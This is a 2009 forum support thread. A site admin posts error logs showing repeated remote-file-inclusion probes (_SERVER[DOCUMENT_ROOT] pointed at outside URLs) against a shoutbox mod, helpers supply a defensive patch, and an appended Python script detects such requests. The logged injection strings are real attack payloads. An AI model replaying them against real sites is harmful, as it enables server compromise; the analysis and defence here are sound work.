"urlencode expects parameter 1 to be string, array given" attacked? exploited?

Started by patalete, July 04, 2009, 06:18:06 PM


patalete

Since yesterday (Friday) I have spotted several "attacks" in the error logs of the forum.

They are all throwing a similar error in the log and it looks kinda suspicious to me..

Can someone take a look and find an explanation?


SMF 2.0 RC1-1
SimplePortal 2.2.2


*********


Guest     Today at 00:05:25
89.108.84.112      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 23:37:22
82.146.59.116      
    Type of error: General
####/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 23:36:47
89.108.84.112      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186

       Guest     Yesterday at 21:17:14
66.232.143.238      
    Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186


*********
They all come from several IPs and countries in a relatively short time lapse...
What's this all about?
Thanks

Arantor

Well, the core reason is that there are multiple ?'s in the URL when there should only be 1.

Since the fault is coming up in SimplePortal, you may get a more relevant answer in the SimplePortal thread over in Modifications.

patalete

So do I link back here or post it again in the SP thread  :P ???

Arantor

Post again in the SP thread, referencing this one.


Arantor

We'll leave this one open in case you don't get a reply from the SP thread (though I'm sure you will).

patalete

No reply in the SP thread and today this started again.. I already updated the post in that thread so I keep this updated too just in case...
Also modified the topic title here now that it seems blank.gif is not the only source of "errors".

Yesterday I banned all the IPs from which I was receiving these queries, but now today...
from a German IP and a new site in .. Russian?! and with a new filename...


Guest Today at 08:40:11
80.67.26.40     
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt???

2: urlencode() expects parameter 1 to be string, array given

File: ###/html/forum/Themes/default/SPortal2.template.php (eval?)
Line: 186


I don't think this might be something good :/

Arantor

It's an SP issue, first and foremost, since it's handling urlencodes, but the multiple ? in it is confusing matters.

You could try reporting it on http://www.simpleportal.net which might see it get answered quicker.

patalete

OK, a new help request has now been opened on the SP site.

I'll leave the link here in case someone is interested in tracking this issue

http://simpleportal.net/index.php?topic=2759.0


thanks.

[SiNaN]

This isn't related to SimplePortal, as it doesn't use urlencode() function at all. It is the error message that gives you the impression that it is related to SimplePortal, because portal layers are included in all pages. Disable template eval, then check your error logs again and you'll see a more accurate error message. You can get more information on how to disable/enable template eval here:

http://www.simplemachines.org/community/index.php?topic=290186.0

* [SiNaN] wonders if SimplePortal should strip out its name from such inaccurate error messages. ::)
Former SMF Core Developer | My Mods | SimplePortal

patalete

Thanks SiNaN..

Will do it and check it later.. and just wait till this happens again..

Will be back when something new appears :)

patalete

Well.. I thought it would never come back even when I lifted the bans on the known IPs... but here it is...

Now the errors show up and I think it's now clearer... it must be with nneonneo's Shoutbox...

Here are the new errors with template eval disabled..


Guest Yesterday at 19:57:49
123.143.98.5     
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/index.template.php
Line: 186

Guest Yesterday at 19:57:45
123.143.98.5   
Type of error: General
###/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://quangpham.info/wp-includes/images/blank.gif??

2: urlencode() expects parameter 1 to be string, array given

File: ###/index.template.php
Line: 186


Here is line #186 marked; it belongs to where we have the yshout code.
Quote
....
// YSHOUT HERE - <head> code
180   global $boardurl,$shoutFile;
181   $shoutFile='home';
182   $scripturlparsed = parse_url($scripturl);
183   $scriptpath=isset($scripturlparsed['path'])?$scripturlparsed['path']:'/';
184   $args='';
185   foreach($_GET as $key => $value) // passthrough $_GET
186      $args.='&'.urlencode($key).'='.urlencode($value);
187   echo '
....

Our SB is set to registered members only; guests just see a msg about that..

So what's that?

An SB spambot? A security hole? Nothing?
>:(

cheers

Kindred

Well, there are lots of potential issues with shoutboxes... (security-wise)


is http://quangpham.info your site?  and if so, are you running some sort of wordpress mod/bridge?
http://quangpham.info/wp-includes/images/blank.gif seems to be looking for a blank image in a wordpress includes directory....

If that is NOT your site, then yes, it would appear to be a hack attempt, although it is getting trapped before execution.
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

patalete

Hi Kindred, none of those belong to my site or domain...

All "attacks" come from worldwide IP ranges but all point to the same source.. in this case those two sites


http://www.peb.com.ua

http://quangpham.info

123.143.98.5

80.67.26.40

82.146.59.116

89.108.84.112

66.232.143.238



I'm receiving like 3-4 weekly "attacks" from the listed IPs..
The IPs look like static ones coming from rented dedicated servers.
Maybe someone can take note of this and add them to a spamlist or blacklist.

I'm aware of the SB risks but I would like to keep it on. Any special advice to avoid this stuff, or just keep it like it is & showing the errors in logs..

thanks

Kindred

Well, there is nothing you can do to "avoid" hack ATTEMPTS, just the hack results. :)

So, I'd say just keep an eye on it.   It is probably someone attempting a vulnerability that was previously patched.

patalete


[SiNaN]

You can prevent the error by:

Code (Find)
$args.='&'.urlencode($key).'='.urlencode($value);

Code (Replace)
if (!is_array($value) && !is_array($key))
	$args.='&'.urlencode($key).'='.urlencode($value);


I doubt he could cause trouble with that, but still you may want to ask the mod author to check it deeply in the support topic of the mod.

And yeah, you can enable the template eval now.

patalete

Nice... all done by now.

Will report to nneonneo but it seems that he has been out for a while now.. "Last Active: June 16"

I think this is solved :P
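
Added example, not part of the thread and not SMF, SimplePortal or Shoutbox code: a small log triage script for the request pattern discussed above, flagging query parameters that are named after a PHP superglobal, carry a remote URL as their value, or use bracket syntax (which PHP parses into the array that `urlencode()` rejected). The function names, finding labels and sample entries are assumptions; the hosts and IPs are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# PHP superglobal names: a request parameter named after one of these is an
# attempt to set server-side state from the URL.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample entries (client IP, request URL); hosts and IPs are
# placeholders from documentation ranges, not values from the thread.
SAMPLE_LOG = [
    ("192.0.2.10", "/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://files.example/blank.gif??"),
    ("198.51.100.7", "/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://files.example/blank.gif??"),
    ("203.0.113.5", "/forum/index.php?_SERVER[DOCUMENT_ROOT]=http://other.example/log.txt???"),
    ("192.0.2.50", "/forum/index.php?action=post&options[]=1"),
    ("192.0.2.99", "/forum/index.php?topic=2759.0"),
]

def classify_request(url):
    """Return the sorted findings for one logged request URL."""
    findings = set()
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        base, bracket, _ = key.partition("[")
        if bracket:
            # PHP parses name[sub]=x into an array; urlencode() on it warns.
            findings.add("array-parameter")
        if base in SUPERGLOBALS:
            findings.add("superglobal-overwrite")
        if REMOTE_URL.match(value):
            findings.add("remote-url-value")
    return sorted(findings)

def clients_by_remote_host(entries):
    """Map each remote host named in an overwrite attempt to its client IPs."""
    grouped = {}
    for client_ip, url in entries:
        if "superglobal-overwrite" not in classify_request(url):
            continue
        for _, value in parse_qsl(urlsplit(url).query):
            if REMOTE_URL.match(value):
                grouped.setdefault(urlsplit(value).hostname, set()).add(client_ip)
    return grouped

if __name__ == "__main__":
    for ip, url in SAMPLE_LOG:
        print(ip, classify_request(url) or "clean")
    print(clients_by_remote_host(SAMPLE_LOG))
```

Grouping by the remote host rather than by client IP reflects what the thread observed: the source addresses keep changing while the URL in the parameter stays the same.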
